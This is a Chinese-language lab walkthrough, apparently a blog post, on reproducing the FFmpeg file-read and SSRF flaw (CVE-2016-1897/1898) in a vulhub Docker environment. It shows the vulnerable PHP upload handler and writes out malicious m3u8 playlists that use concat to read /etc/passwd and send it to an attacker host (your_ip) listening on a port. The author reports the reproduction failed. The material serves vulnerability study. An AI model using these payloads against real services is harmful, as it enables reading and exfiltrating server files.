ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)

漏洞描述

影响范围

  • FFmpeg 2.8.x < 2.8.5
  • FFmpeg 2.7.x < 2.7.5
  • FFmpeg 2.6.x < 2.6.7
  • FFmpeg 2.5.x < 2.5.10

漏洞环境及利用

搭建docker环境

访问8080端口看到上传界面

由于vulhub并没有讲述该漏洞如何复现,我们需要进入环境查看源码

<?php

if(!empty($_FILES)) {

filename = escapeshellarg(_FILES'file''tmp_name');

$newname = './' . uniqid() . '.mp4';

shell_exec("ffmpeg -i filename newname");

}

?>

可以看到就是调用了ffmpeg这个工具来处理文件

这是一个恶意请求的m3u8文件:

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

http://your_ip:9999/test.txt

#EXT-X-ENDLIST

文件格式如下:

#EXTM3U 标签是 m3u8 的文件头,开头必须要这一行

#EXT-X-MEDIA-SEQUENCE 表示每一个media URI 在 PlayList中只有唯一的序号,相邻之间序号+1

#EXTINF:10.0, 表示该一段 TS 流文件的长度

#EXT-X-ENDLIST 这个相当于文件结束符

这些是 m3u8 的最基本的标签,而问题就出在 FFMpeg 去请求 TS 流文件(URL)时,FFMpeg 不会判断里面的流地址,直接请求。所以我们可以试想,用FFMpeg内自带的concat函数,将一个不包含文件结束符的文件与file协议读取的文件衔接起来,请求回攻击机,就能够达到读取任意文件的效果!

漏洞复现

首先,我们需要在 web 服务器上创建一个 back.txt,文件内容是 m3u8 的格式,其中不包含文件结束符。

其次,我们再创建一个恶意的 m3u8 文件,文件内容通过 concat 拼接本地文件/etc/passwd。

最后,我们上传这个恶意的 m3u8 文件。

back.txt:

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:,

http://your_ip:9999/?

upload.m3u8:

#EXTM3U

#EXT-X-TARGETDURATION:6

#EXTINF:10.0,

concat:http://your_ip/back.txt|file:///etc/passwd

#EXT-X-ENDLIST

Tip: 以上的文件需要使用记事本编辑保存,选择默认 utf-8 格式。使用vim来编译可能会导致复现失败。

使用python来搭建一个简易的web,将back.txt部署到web上。

python2 -m SimpleHTTPServer 8888

python3 -m http.server 8888

上传恶意m3u8文件,并监听9999端口

复现失败了

相关推荐
糖果店的幽灵1 小时前
安全测试从入门到精通 - 环境搭建与基础工具选择
安全·web安全
Joker时代2 小时前
重塑Web3安全防线:Vkey验证器正式登陆安卓与iOS平台,开启数字资产防护新纪元
安全·web3
科技发布2 小时前
有没有安全正规的广告交易平台?推荐传播易APP
安全
JL152 小时前
Agent工程-为什么Agent必须有观测和Tracing
服务器·网络·人工智能·安全
珠***格4 小时前
边缘计算+轻量化AI:台区储能四可装置的“智能大脑”
人工智能·分布式·安全·能源·边缘计算
GoFly开发者4 小时前
Go语言开发框架GoFlyGen新增 网站安全助手 插件,帮助开发者提供应用安全防护,保障平台系统数据安全。
网络·安全
笺落彼岸5 小时前
SpringBoot3 JDK17集成proguard实现混淆打包
安全·https
甄同学5 小时前
第十七篇:Bash Executor命令执行器,安全运行Shell命令
开发语言·安全·bash
h3guang Official5 小时前
K8s安全实战:从漏洞靶场到红蓝对抗
安全·容器·kubernetes
星释7 小时前
鸿蒙智能体开发实战:29.智能体安全与成本优化
服务器·安全·华为·harmonyos·鸿蒙·智能体